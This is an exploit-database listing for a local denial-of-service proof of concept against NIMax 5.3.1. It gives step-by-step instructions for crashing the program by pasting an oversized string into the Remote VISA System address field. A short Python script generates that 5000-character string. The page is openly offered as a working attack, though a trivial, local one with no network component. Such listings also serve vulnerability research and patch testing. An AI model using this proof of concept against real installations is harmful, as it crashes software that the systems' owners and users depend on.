nimax 5.3.1 remote visa system denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Right click "Remote systems" and press "Create New" 4 - Select "Remote VISA System" and press "Next" 5 - Paste clipboard in "Remote VISA System Address" 6 - Press finish and DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")
Nimax 5.3.1 remote visa system denial of service (poc) Vulnerability / Exploit Source : Nimax 5.3.1 remote visa system denial of service (poc)